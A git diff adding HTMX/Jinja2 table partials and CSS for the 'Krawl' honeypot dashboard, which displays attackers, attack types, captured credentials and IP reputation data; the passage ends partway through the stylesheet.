diff --git a/src/templates/jinja2/dashboard/partials/attack_types_table.html b/src/templates/jinja2/dashboard/partials/attack_types_table.html new file mode 100644 index 0000000..4ac3369 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/attack_types_table.html @@ -0,0 +1,83 @@ +{# HTMX fragment: Detected Attack Types table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + + + {% for attack in items %} + + + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP AddressPathAttack TypesUser-Agent + Time +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ attack.ip | e }} + +
+ {{ attack.path | e }} + {% if attack.path | length > 30 %} +
{{ attack.path | e }}
+ {% endif %} +
+
+
+ {{ attack.attack_type | e }} + {% if attack.attack_type | length > 30 %} +
{{ attack.attack_type | e }}
+ {% endif %} +
+
{{ (attack.user_agent | default(''))[:50] | e }}{{ attack.timestamp | format_ts }} + {% if attack.log_id %} + + {% endif %} + +
No attacks detected
diff --git a/src/templates/jinja2/dashboard/partials/attackers_table.html b/src/templates/jinja2/dashboard/partials/attackers_table.html new file mode 100644 index 0000000..1bcbb40 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/attackers_table.html @@ -0,0 +1,74 @@ +{# HTMX fragment: Attackers table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} attackers +
+ + +
+
+ + + + + + + + + + + + + + {% for ip in items %} + + + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP Address + Total Requests + + First Seen + Last SeenLocation
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ ip.ip | e }} + {{ ip.total_requests }}{{ ip.first_seen | format_ts }}{{ ip.last_seen | format_ts }}{{ ip.city | default('') | e }}{% if ip.city and ip.country_code %}, {% endif %}{{ ip.country_code | default('N/A') | e }} + +
No attackers found
diff --git a/src/templates/jinja2/dashboard/partials/credentials_table.html b/src/templates/jinja2/dashboard/partials/credentials_table.html new file mode 100644 index 0000000..c7ee193 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/credentials_table.html @@ -0,0 +1,66 @@ +{# HTMX fragment: Captured Credentials table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + + + {% for cred in items %} + + + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP AddressUsernamePasswordPath + Time +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ cred.ip | e }} + {{ cred.username | default('N/A') | e }}{{ cred.password | default('N/A') | e }}{{ cred.path | default('') | e }}{{ cred.timestamp | format_ts }} + +
No credentials captured
diff --git a/src/templates/jinja2/dashboard/partials/honeypot_table.html b/src/templates/jinja2/dashboard/partials/honeypot_table.html new file mode 100644 index 0000000..302df69 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/honeypot_table.html @@ -0,0 +1,60 @@ +{# HTMX fragment: Honeypot triggers table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + {% for item in items %} + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP Address + Honeypot Triggers +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ item.ip | e }} + {{ item.count }} + +
No data
diff --git a/src/templates/jinja2/dashboard/partials/ip_detail.html b/src/templates/jinja2/dashboard/partials/ip_detail.html new file mode 100644 index 0000000..8082859 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/ip_detail.html @@ -0,0 +1,131 @@ +{# HTMX fragment: IP detail expansion row content #} +{# Replaces the ~250 line formatIpStats() JavaScript function #} +
+
+ Total Requests: + {{ stats.total_requests | default('N/A') }} +
+
+ First Seen: + {{ stats.first_seen | format_ts }} +
+
+ Last Seen: + {{ stats.last_seen | format_ts }} +
+ {% if stats.city or stats.country_code %} +
+ Location: + {{ stats.city | default('') }}{% if stats.city and stats.country_code %}, {% endif %}{{ stats.country_code | default('') }} +
+ {% endif %} + {% if stats.reverse_dns %} +
+ Reverse DNS: + {{ stats.reverse_dns | e }} +
+ {% endif %} + {% if stats.asn_org %} +
+ ASN Org: + {{ stats.asn_org | e }} +
+ {% endif %} + {% if stats.asn %} +
+ ASN: + {{ stats.asn | e }} +
+ {% endif %} + {% if stats.isp %} +
+ ISP: + {{ stats.isp | e }} +
+ {% endif %} + + {# Flags #} + {% set flags = [] %} + {% if stats.is_proxy %}{% set _ = flags.append('Proxy') %}{% endif %} + {% if stats.is_hosting %}{% set _ = flags.append('Hosting') %}{% endif %} + {% if flags %} +
+ Flags: + {{ flags | join(', ') }} +
+ {% endif %} + + {% if stats.reputation_score is not none %} +
+ Reputation Score: + + {{ stats.reputation_score }}/100 + +
+ {% endif %} + + {% if stats.category %} +
+ Category: + + {{ stats.category | replace('_', ' ') | title }} + +
+ {% endif %} + + {# Timeline + Reputation section #} + {% if stats.category_history or stats.blocklist_memberships %} +
+
+ {# Behavior Timeline #} + {% if stats.category_history %} +
+
Behavior Timeline
+
+ {% for entry in stats.category_history %} +
+
+
+ {{ entry.new_category | default('unknown') | replace('_', ' ') | title }} + {% if entry.old_category %} from {{ entry.old_category | replace('_', ' ') | title }}{% endif %} +
{{ entry.timestamp | format_ts }} +
+
+ {% endfor %} +
+
+ {% endif %} + + {# Reputation / Listed On #} +
+
Reputation
+ {% if stats.blocklist_memberships %} +
Listed On
+ {% for bl in stats.blocklist_memberships %} + {{ bl | e }} + {% endfor %} + {% else %} + Clean - Not listed on any blocklists + {% endif %} +
+
+
+ {% endif %} +
+ +{# Radar chart (right side) #} +{% if stats.category_scores %} +
+
+ +
+
+{% endif %} diff --git a/src/templates/jinja2/dashboard/partials/ip_insight.html b/src/templates/jinja2/dashboard/partials/ip_insight.html new file mode 100644 index 0000000..e7977b7 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/ip_insight.html @@ -0,0 +1,5 @@ +{# HTMX fragment: IP Insight - inline display within dashboard tabs #} +
+ {% set uid = "insight" %} + {% include "dashboard/partials/_ip_detail.html" %} +
diff --git a/src/templates/jinja2/dashboard/partials/map_section.html b/src/templates/jinja2/dashboard/partials/map_section.html new file mode 100644 index 0000000..0112219 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/map_section.html @@ -0,0 +1,38 @@ +{# Map section with filter checkboxes #} +
+

IP Origins Map

+
+ + | + + + + + +
+
+
diff --git a/src/templates/jinja2/dashboard/partials/patterns_table.html b/src/templates/jinja2/dashboard/partials/patterns_table.html new file mode 100644 index 0000000..003f7e3 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/patterns_table.html @@ -0,0 +1,43 @@ +{# HTMX fragment: Attack Patterns table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} patterns +
+ + +
+
+ + + + + + + + + + {% for pattern in items %} + + + + + + {% else %} + + {% endfor %} + +
#Attack PatternOccurrences
{{ loop.index + (pagination.page - 1) * pagination.page_size }} +
+ {{ pattern.pattern | e }} + {% if pattern.pattern | length > 40 %} +
{{ pattern.pattern | e }}
+ {% endif %} +
+
{{ pattern.count }}
No patterns found
diff --git a/src/templates/jinja2/dashboard/partials/raw_request_modal.html b/src/templates/jinja2/dashboard/partials/raw_request_modal.html new file mode 100644 index 0000000..06a46bb --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/raw_request_modal.html @@ -0,0 +1,20 @@ +{# Raw request viewer modal - Alpine.js controlled #} +
+
+
+

Raw HTTP Request

+ × +
+
+

+        
+ +
+
diff --git a/src/templates/jinja2/dashboard/partials/search_results.html b/src/templates/jinja2/dashboard/partials/search_results.html new file mode 100644 index 0000000..1ae0d41 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/search_results.html @@ -0,0 +1,164 @@ +{# HTMX fragment: Search results for attacks and IPs #} +
+ +
+ + Found {{ pagination.total_attacks }} attack{{ 's' if pagination.total_attacks != 1 else '' }} + and {{ pagination.total_ips }} IP{{ 's' if pagination.total_ips != 1 else '' }} + for “{{ query | e }}” + + +
+ + {# ── Matching IPs ─────────────────────────────────── #} + {% if ips %} +
+

Matching IPs

+ + + + + + + + + + + + + + + {% for ip in ips %} + + + + + + + + + + + + + + {% endfor %} + +
#IP AddressRequestsCategoryLocationISP / ASNLast Seen
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ ip.ip | e }} + {{ ip.total_requests }} + {% if ip.category %} + + {{ ip.category | e }} + + {% else %} + unknown + {% endif %} + {{ ip.city | default('') | e }}{% if ip.city and ip.country_code %}, {% endif %}{{ ip.country_code | default('N/A') | e }}{{ ip.isp | default(ip.asn_org | default('N/A')) | e }}{{ ip.last_seen | format_ts }} + +
+
+ {% endif %} + + {# ── Matching Attacks ─────────────────────────────── #} + {% if attacks %} +
+

Matching Attacks

+ + + + + + + + + + + + + + {% for attack in attacks %} + + + + + + + + + + + + + {% endfor %} + +
#IP AddressPathAttack TypesUser-AgentTimeActions
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ attack.ip | e }} + +
+ {{ attack.path | e }} + {% if attack.path | length > 30 %} +
{{ attack.path | e }}
+ {% endif %} +
+
+
+ {% set types_str = attack.attack_types | join(', ') %} + {{ types_str | e }} + {% if types_str | length > 30 %} +
{{ types_str | e }}
+ {% endif %} +
+
{{ (attack.user_agent | default(''))[:50] | e }}{{ attack.timestamp | format_ts }} + {% if attack.log_id %} + + {% endif %} +
+
+ {% endif %} + + {# ── Pagination ───────────────────────────────────── #} + {% if pagination.total_pages > 1 %} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} +
+ + +
+
+ {% endif %} + + {# ── No results ───────────────────────────────────── #} + {% if not attacks and not ips %} +
+ No results found for “{{ query | e }}” +
+ {% endif %} + +
diff --git a/src/templates/jinja2/dashboard/partials/stats_cards.html b/src/templates/jinja2/dashboard/partials/stats_cards.html new file mode 100644 index 0000000..260076c --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/stats_cards.html @@ -0,0 +1,31 @@ +{# Stats cards - server-rendered on initial page load #} +
+
+
{{ stats.total_accesses }}
+
Total Accesses
+
+
+
{{ stats.unique_ips }}
+
Unique IPs
+
+
+
{{ stats.unique_paths }}
+
Unique Paths
+
+
+
{{ stats.suspicious_accesses }}
+
Suspicious Accesses
+
+
+
{{ stats.honeypot_ips | default(0) }}
+
Honeypot Caught
+
+
+
{{ stats.credential_count | default(0) }}
+
Credentials Captured
+
+
+
{{ stats.unique_attackers | default(0) }}
+
Unique Attackers
+
+
diff --git a/src/templates/jinja2/dashboard/partials/suspicious_table.html b/src/templates/jinja2/dashboard/partials/suspicious_table.html new file mode 100644 index 0000000..333e8df --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/suspicious_table.html @@ -0,0 +1,45 @@ +{# Recent Suspicious Activity - server-rendered on page load #} +
+

Recent Suspicious Activity

+ + + + + + + + + + + + {% for activity in suspicious_activities %} + + + + + + + + + + + {% else %} + + {% endfor %} + +
IP AddressPathUser-AgentTime
+ {{ activity.ip | e }} + {{ activity.path | e }}{{ (activity.user_agent | default(''))[:80] | e }}{{ activity.timestamp | format_ts(time_only=True) }} + +
No suspicious activity detected
+
diff --git a/src/templates/jinja2/dashboard/partials/top_ips_table.html b/src/templates/jinja2/dashboard/partials/top_ips_table.html new file mode 100644 index 0000000..d4614c2 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/top_ips_table.html @@ -0,0 +1,66 @@ +{# HTMX fragment: Top IPs table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + {% for item in items %} + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP AddressCategory + Access Count +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ item.ip | e }} + + {% set cat = item.category | default('unknown') %} + {% set cat_colors = {'attacker': '#f85149', 'good_crawler': '#3fb950', 'bad_crawler': '#f0883e', 'regular_user': '#58a6ff', 'unknown': '#8b949e'} %} + + {{ item.count }} + +
No data
diff --git a/src/templates/jinja2/dashboard/partials/top_paths_table.html b/src/templates/jinja2/dashboard/partials/top_paths_table.html new file mode 100644 index 0000000..c102410 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/top_paths_table.html @@ -0,0 +1,41 @@ +{# HTMX fragment: Top Paths table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + {% for item in items %} + + + + + + {% else %} + + {% endfor %} + +
#Path + Access Count +
{{ loop.index + (pagination.page - 1) * pagination.page_size }}{{ item.path | e }}{{ item.count }}
No data
diff --git a/src/templates/jinja2/dashboard/partials/top_ua_table.html b/src/templates/jinja2/dashboard/partials/top_ua_table.html new file mode 100644 index 0000000..2026005 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/top_ua_table.html @@ -0,0 +1,41 @@ +{# HTMX fragment: Top User-Agents table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + {% for item in items %} + + + + + + {% else %} + + {% endfor %} + +
#User-Agent + Count +
{{ loop.index + (pagination.page - 1) * pagination.page_size }}{{ item.user_agent | e }}{{ item.count }}
No data
diff --git a/src/templates/static/css/dashboard.css b/src/templates/static/css/dashboard.css new file mode 100644 index 0000000..5074528 --- /dev/null +++ b/src/templates/static/css/dashboard.css @@ -0,0 +1,1790 @@ +/* Krawl Dashboard Styles */ +/* Extracted from dashboard_template.py */ + +body { + font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; + background-color: #0d1117; + color: #c9d1d9; + margin: 0; + padding: 20px; +} +.container { + max-width: 1400px; + margin: 0 auto; + position: relative; +} +.github-logo { + position: absolute; + top: 0; + left: 0; + display: flex; + align-items: center; + gap: 8px; + text-decoration: none; + color: #58a6ff; + transition: color 0.2s; +} +.github-logo:hover { + color: #79c0ff; +} +.github-logo svg { + width: 32px; + height: 32px; + fill: currentColor; +} +.github-logo-text { + font-size: 14px; + font-weight: 600; + text-decoration: none; +} +h1 { + color: #58a6ff; + text-align: center; + margin-bottom: 40px; + font-weight: 900; + font-family: 'Google Sans Flex', 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; +} +.download-section { + position: absolute; + top: 0; + right: 0; +} +.download-btn { + display: inline-block; + padding: 8px 14px; + background: #238636; + color: #ffffff; + text-decoration: none; + border-radius: 6px; + font-weight: 500; + font-size: 13px; + transition: background 0.2s; + border: 1px solid #2ea043; +} +.download-btn:hover { + background: #2ea043; +} +.download-btn:active { + background: #1f7a2f; +} +.banlist-dropdown { + position: relative; + display: inline-block; + width: 100%; +} +.banlist-dropdown-btn { + display: block; + width: 100%; + padding: 8px 14px; + background: rgba(35, 134, 54, 0.4); + color: rgba(255, 255, 255, 0.7); + text-decoration: none; + border-radius: 6px; + font-weight: 500; + font-size: 13px; + transition: background 0.2s, color 0.2s; + border: 1px solid rgba(46, 160, 67, 0.4); + cursor: pointer; + text-align: left; + box-sizing: border-box; +} +.banlist-dropdown-btn:hover { + background: rgba(46, 160, 67, 0.6); + color: #ffffff; +} +.banlist-dropdown-menu { + display: none; + position: absolute; + right: 0; + left: 0; + background-color: #161b22; + box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.3); + z-index: 1; + border: 1px solid #30363d; + border-radius: 6px; + margin-top: 4px; + overflow: hidden; +} +.banlist-dropdown-menu.show { + display: block; +} +.banlist-dropdown-menu a { + color: #c9d1d9; + padding: 6px 12px; + text-decoration: none; + display: flex; + align-items: center; + gap: 6px; + transition: background 0.2s; + font-size: 12px; +} +.banlist-dropdown-menu a:hover { + background-color: #1c2128; + color: #58a6ff; +} +.banlist-dropdown-menu a.disabled { + color: #6e7681; + cursor: not-allowed; + pointer-events: none; +} +.banlist-icon { + font-size: 14px; +} +.stats-grid { + display: grid; + grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); + gap: 20px; + margin-bottom: 40px; +} +.stat-card { + background: #161b22; + border: 1px solid #30363d; + border-radius: 6px; + padding: 20px; + text-align: center; +} +.stat-card.alert { + border-color: #f85149; +} +.stat-value { + font-size: 36px; + font-weight: bold; + color: #58a6ff; +} +.stat-value.alert { + color: #f85149; +} +.stat-label { + font-size: 14px; + color: #8b949e; + margin-top: 5px; +} +.table-container { + background: #161b22; + border: 1px solid #30363d; + border-radius: 6px; + padding: 12px; + margin-bottom: 20px; +} +h2 { + color: #58a6ff; + margin-top: 0; +} +table { + width: 100%; + border-collapse: collapse; +} +th, td { + padding: 12px; + text-align: left; + border-bottom: 1px solid #30363d; +} +th { + background: #0d1117; + color: #58a6ff; + font-weight: 600; +} +tr:hover { + background: #1c2128; +} +.rank { + color: #8b949e; + font-weight: bold; +} +.alert-section { + background: #161b22; + border-left: 6px solid rgba(248, 81, 73, 0.4); +} +th.sortable { + cursor: pointer; + user-select: none; + position: relative; + padding-right: 24px; +} +th.sortable:hover { + background: #1c2128; +} +th.sortable::after { + content: '\21C5'; + position: absolute; + right: 8px; + opacity: 0.5; + font-size: 12px; +} +th.sortable.asc::after { + content: '\25B2'; + opacity: 1; +} +th.sortable.desc::after { + content: '\25BC'; + opacity: 1; +} +tbody { + transition: opacity 0.1s ease; +} +tbody { + animation: fadeIn 0.3s ease-in; +} +.ip-row { + transition: background-color 0.2s; +} +.ip-clickable { + cursor: pointer; + color: #58a6ff !important; + font-weight: 500; + text-decoration: underline; + text-decoration-style: dotted; + text-underline-offset: 3px; +} +.ip-clickable:hover { + color: #79c0ff !important; + text-decoration-style: solid; + background: #1c2128; +} +.ip-stats-row { + background: #0d1117; +} +.ip-stats-cell { + padding: 0 !important; +} +.ip-stats-dropdown { + margin-top: 10px; + padding: 15px; + background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + font-size: 13px; + display: flex; + gap: 20px; +} +.stats-left { + flex: 1; +} +.stats-right { + flex: 0 0 200px; + display: flex; + flex-direction: column; + align-items: center; + justify-content: center; +} +.radar-chart { + position: relative; + width: 280px; + height: 280px; + overflow: visible; +} +.radar-legend { + margin-top: 0; + font-size: 11px; + flex-shrink: 0; +} +.radar-legend-item { + display: flex; + align-items: center; + gap: 6px; + margin: 4px 0; +} +.radar-legend-color { + width: 12px; + height: 12px; + border-radius: 2px; +} +.ip-stats-dropdown .loading { + color: #8b949e; + font-style: italic; +} +.stat-row { + display: flex; + justify-content: space-between; + padding: 5px 0; + border-bottom: 1px solid #21262d; +} +.stat-row:last-child { + border-bottom: none; +} +.stat-label-sm { + color: #8b949e; + font-weight: 500; +} +.stat-value-sm { + color: #58a6ff; + font-weight: 600; +} +.category-badge { + display: inline-block; + padding: 4px 8px; + border-radius: 4px; + font-size: 12px; + font-weight: 600; + text-transform: uppercase; +} +.category-attacker { + background: #f851491a; + color: #f85149; + border: 1px solid #f85149; +} +.category-good-crawler { + background: #3fb9501a; + color: #3fb950; + border: 1px solid #3fb950; +} +.category-bad-crawler { + background: #f0883e1a; + color: #f0883e; + border: 1px solid #f0883e; +} +.category-regular-user { + background: #58a6ff1a; + color: #58a6ff; + border: 1px solid #58a6ff; +} +.category-unknown { + background: #8b949e1a; + color: #8b949e; + border: 1px solid #8b949e; +} +.timeline-section { + margin-top: 15px; + padding-top: 15px; + border-top: 1px solid #30363d; +} +.timeline-container { + display: flex; + gap: 20px; + min-height: 200px; +} +.timeline-column { + flex: 1; + min-width: 0; + overflow: auto; + max-height: 350px; +} +.timeline-column:first-child { + flex: 1.5; +} +.timeline-column:last-child { + flex: 1; +} +.timeline-header { + color: #58a6ff; + font-size: 13px; + font-weight: 600; + margin-bottom: 12px; + padding-bottom: 8px; + border-bottom: 1px solid #30363d; +} +.reputation-title { + color: #8b949e; + font-size: 11px; + font-weight: 600; + text-transform: uppercase; + margin-bottom: 8px; +} +.reputation-badge { + display: inline-flex; + align-items: center; + gap: 3px; + padding: 4px 8px; + background: #161b22; + border: 1px solid #f851494d; + border-radius: 4px; + font-size: 11px; + color: #f85149; + text-decoration: none; + transition: all 0.2s; + margin-bottom: 6px; + margin-right: 6px; + white-space: nowrap; +} +.reputation-badge:hover { + background: #1c2128; + border-color: #f85149; +} +.reputation-clean { + display: inline-flex; + align-items: center; + gap: 3px; + padding: 4px 8px; + background: #161b22; + border: 1px solid #3fb9504d; + border-radius: 4px; + font-size: 11px; + color: #3fb950; + margin-bottom: 6px; +} +.timeline { + position: relative; + padding-left: 28px; +} +.timeline::before { + content: ''; + position: absolute; + left: 11px; + top: 0; + bottom: 0; + width: 2px; + background: #30363d; +} +.timeline-item { + position: relative; + padding-bottom: 12px; + font-size: 12px; +} +.timeline-item:last-child { + padding-bottom: 0; +} +.timeline-marker { + position: absolute; + left: -23px; + width: 14px; + height: 14px; + border-radius: 50%; + border: 2px solid #0d1117; +} +.timeline-marker.attacker { background: #f85149; } +.timeline-marker.good-crawler { background: #3fb950; } +.timeline-marker.bad-crawler { background: #f0883e; } +.timeline-marker.regular-user { background: #58a6ff; } +.timeline-marker.unknown { background: #8b949e; } + +/* ── IP Insight Page Layout ─────────────────────── */ +.ip-insight-content { + animation: fadeIn 0.3s ease-in; +} +.ip-page-header { + margin-bottom: 20px; +} +.ip-page-header h1 { + display: flex; + align-items: center; + gap: 12px; + margin: 0 0 4px 0; +} +.ip-address-title { + font-size: 28px; + font-weight: 700; + color: #e6edf3; + font-family: monospace; +} +.ip-location-subtitle { + color: #8b949e; + font-size: 14px; + margin: 4px 0 0 0; +} + +/* Quick stats bar */ +.ip-stats-bar { + display: flex; + gap: 12px; + margin-bottom: 20px; + flex-wrap: wrap; +} +.ip-stat-chip { + background: #161b22; + border: 1px solid #30363d; + border-radius: 8px; + padding: 12px 20px; + display: flex; + flex-direction: column; + gap: 2px; + min-width: 0; + flex: 1 1 0; +} +.ip-stat-chip-value { + color: #e6edf3; + font-size: 16px; + font-weight: 700; + white-space: nowrap; + overflow: hidden; + text-overflow: ellipsis; +} +.ip-stat-chip-label { + color: #8b949e; + font-size: 11px; + text-transform: uppercase; + letter-spacing: 0.5px; + font-weight: 500; +} + +/* Two-column grid */ +.ip-page-grid { + display: grid; + grid-template-columns: 1fr 1fr; + gap: 20px; + align-items: stretch; +} +.ip-page-left, +.ip-page-right { + display: flex; + flex-direction: column; + gap: 20px; + min-height: 0; +} +/* Left card fills column height */ +.ip-info-card { + flex: 1; + display: flex; + flex-direction: column; +} +/* Timeline card grows to fill remaining space */ +.ip-timeline-card { + flex: 1; + display: flex; + flex-direction: column; + min-height: 0; +} + +/* Detail cards */ +.ip-detail-card h2 { + margin-top: 0; + margin-bottom: 16px; +} +/* Remove bottom margin inside grid columns (gap handles spacing) */ +.ip-page-left .table-container, +.ip-page-right .table-container { + margin-bottom: 0; +} + +/* Definition list for IP info */ +.ip-dl { + margin: 0; + display: flex; + flex-direction: column; + gap: 0; +} +.ip-dl-row { + display: flex; + justify-content: space-between; + align-items: baseline; + padding: 8px 0; + border-bottom: 1px solid #21262d; + gap: 16px; +} +.ip-dl-row:last-child { + border-bottom: none; +} +.ip-dl dt { + color: #8b949e; + font-size: 13px; + font-weight: 500; + flex-shrink: 0; + min-width: 100px; +} +.ip-dl dd { + margin: 0; + color: #e6edf3; + font-size: 13px; + font-weight: 500; + text-align: right; + word-break: break-word; +} +.ip-dl-mono { + font-family: monospace; + font-size: 12px; +} + +/* Section headings inside IP info card */ +.ip-section-heading { + color: #e6edf3; + font-size: 15px; + font-weight: 700; + margin: 18px 0 8px 0; + padding: 0; +} +.ip-section-heading:first-of-type { + margin-top: 0; +} +/* Highlighted date values */ +.ip-dl-highlight { + color: #58a6ff; +} + +/* Scrollable reputation container */ +.ip-rep-scroll { + max-height: 200px; + overflow-y: auto; + scrollbar-width: thin; + scrollbar-color: #30363d #161b22; +} +.ip-rep-scroll::-webkit-scrollbar { + width: 6px; +} +.ip-rep-scroll::-webkit-scrollbar-track { + background: #161b22; + border-radius: 3px; +} +.ip-rep-scroll::-webkit-scrollbar-thumb { + background: #30363d; + border-radius: 3px; +} +.ip-rep-scroll::-webkit-scrollbar-thumb:hover { + background: #484f58; +} + +/* Scrollable behavior timeline – show ~5 entries max */ +.ip-timeline-scroll { + max-height: 230px; + overflow-y: auto; + min-height: 0; + scrollbar-width: thin; + scrollbar-color: #30363d #161b22; +} +.ip-timeline-scroll::-webkit-scrollbar { + width: 6px; +} +.ip-timeline-scroll::-webkit-scrollbar-track { + background: #161b22; + border-radius: 3px; +} +.ip-timeline-scroll::-webkit-scrollbar-thumb { + background: #30363d; + border-radius: 3px; +} +.ip-timeline-scroll::-webkit-scrollbar-thumb:hover { + background: #484f58; +} + +/* Reputation section */ +.ip-rep-row { + padding: 10px 0; + border-bottom: 1px solid #21262d; + display: flex; + align-items: flex-start; + gap: 16px; +} +.ip-rep-row:last-child { + border-bottom: none; +} +.ip-rep-label { + color: #8b949e; + font-size: 13px; + font-weight: 500; + flex-shrink: 0; + min-width: 80px; + padding-top: 2px; +} +.ip-rep-tags { + display: flex; + flex-wrap: wrap; + gap: 6px; +} + +/* Flags & badges */ +.ip-flag { + display: inline-block; + background: #1c2128; + border: 1px solid #f0883e4d; + border-radius: 4px; + padding: 3px 10px; + font-size: 12px; + color: #f0883e; + font-weight: 500; +} +.reputation-score { + font-weight: 700; +} +.reputation-score.bad { color: #f85149; } +.reputation-score.medium { color: #f0883e; } +.reputation-score.good { color: #3fb950; } +.blocklist-badges { + display: flex; + flex-wrap: wrap; + gap: 6px; +} + +/* Bottom row: Timeline + Attack Types side by side */ +.ip-bottom-row { + display: flex; + gap: 20px; + flex: 1; + min-height: 0; +} +.ip-bottom-row .ip-timeline-card { + flex: 1; + min-width: 0; +} +.ip-attack-types-card { + flex: 1; + display: flex; + flex-direction: column; + min-width: 0; +} +.ip-attack-chart-wrapper { + flex: 1; + position: relative; + min-height: 180px; +} + +/* Radar chart */ +.radar-chart-container { + display: flex; + align-items: center; + justify-content: center; + padding: 10px 0; +} + +/* ── Behavior Timeline (full-width horizontal) ──── */ +.ip-timeline-hz { + display: flex; + flex-direction: column; + gap: 0; + position: relative; + padding-left: 24px; +} +.ip-timeline-hz::before { + content: ''; + position: absolute; + left: 7px; + top: 8px; + bottom: 8px; + width: 2px; + background: #30363d; +} +.ip-tl-entry { + display: flex; + align-items: flex-start; + gap: 14px; + position: relative; + padding: 10px 0; +} +.ip-tl-entry:not(:last-child) { + border-bottom: 1px solid #161b22; +} +.ip-tl-dot { + width: 14px; + height: 14px; + border-radius: 50%; + flex-shrink: 0; + border: 2px solid #0d1117; + position: absolute; + left: -24px; + top: 12px; + z-index: 1; +} +.ip-tl-dot.attacker { background: #f85149; box-shadow: 0 0 6px #f8514980; } +.ip-tl-dot.good-crawler { background: #3fb950; box-shadow: 0 0 6px #3fb95080; } +.ip-tl-dot.bad-crawler { background: #f0883e; box-shadow: 0 0 6px #f0883e80; } +.ip-tl-dot.regular-user { background: #58a6ff; box-shadow: 0 0 6px #58a6ff80; } +.ip-tl-dot.unknown { background: #8b949e; } +.ip-tl-content { + display: flex; + align-items: baseline; + gap: 10px; + flex-wrap: wrap; + min-width: 0; +} +.ip-tl-cat { + color: #e6edf3; + font-weight: 600; + font-size: 14px; +} +.ip-tl-from { + color: #8b949e; + font-size: 13px; +} +.ip-tl-time { + color: #484f58; + font-size: 12px; + margin-left: auto; + white-space: nowrap; +} + +/* Legacy compat (unused) */ + +@media (max-width: 900px) { + .ip-page-grid { + grid-template-columns: 1fr; + } + .ip-stats-bar { + flex-direction: column; + } + .ip-stat-chip { + flex: 1 1 auto; + } + .ip-bottom-row { + flex-direction: column; + } + .ip-tl-content { + flex-direction: column; + gap: 2px; + } + .ip-tl-time { + margin-left: 0; + } +} + +.tabs-container { + border-bottom: 1px solid #30363d; + margin-bottom: 30px; + display: flex; + gap: 2px; + background: #161b22; + border-radius: 6px 6px 0 0; + overflow-x: auto; + overflow-y: hidden; +} +.tab-button { + padding: 12px 20px; + background: transparent; + border: none; + color: #8b949e; + font-size: 14px; + font-weight: 500; + cursor: pointer; + white-space: nowrap; + transition: all 0.2s; + border-bottom: 3px solid transparent; + position: relative; + bottom: -1px; +} +.tab-button:hover { + color: #c9d1d9; + background: #1c2128; +} +.tab-button.active { + color: #58a6ff; + border-bottom-color: #58a6ff; +} +.tab-button.disabled { + color: #484f58; + cursor: not-allowed; + opacity: 0.6; +} +.tab-button.disabled:hover { + color: #484f58; + background: transparent; +} +.tab-content { + display: none; +} +.tab-content.active { + display: block; +} +.ip-stats-table { + width: 100%; + border-collapse: collapse; +} +.ip-stats-table th, .ip-stats-table td { + padding: 12px; + text-align: left; + border-bottom: 1px solid #30363d; +} +.ip-stats-table th { + background: #0d1117; + color: #58a6ff; + font-weight: 600; +} +.ip-stats-table tr:hover { + background: #1c2128; +} +.ip-detail-modal { + display: none; + position: fixed; + top: 0; + left: 0; + width: 100%; + height: 100%; + background: rgba(0, 0, 0, 0.7); + z-index: 1000; + align-items: center; + justify-content: center; +} +.ip-detail-modal.show { + display: flex; +} +.ip-detail-content { + background: #161b22; + border: 1px solid #30363d; + border-radius: 8px; + padding: 30px; + max-width: 900px; + max-height: 90vh; + overflow-y: auto; + position: relative; +} +.ip-detail-close { + position: absolute; + top: 15px; + right: 15px; + background: none; + border: none; + color: #8b949e; + font-size: 24px; + cursor: pointer; + padding: 0; + width: 30px; + height: 30px; + display: flex; + align-items: center; + justify-content: center; +} +.ip-detail-close:hover { + color: #c9d1d9; +} +#attacker-map { + background: #0d1117 !important; +} +.leaflet-container { + background: #0d1117 !important; +} +.leaflet-tile { + filter: none; +} +.leaflet-popup-content-wrapper { + background-color: #0d1117; + color: #c9d1d9; + border: 1px solid #30363d; + border-radius: 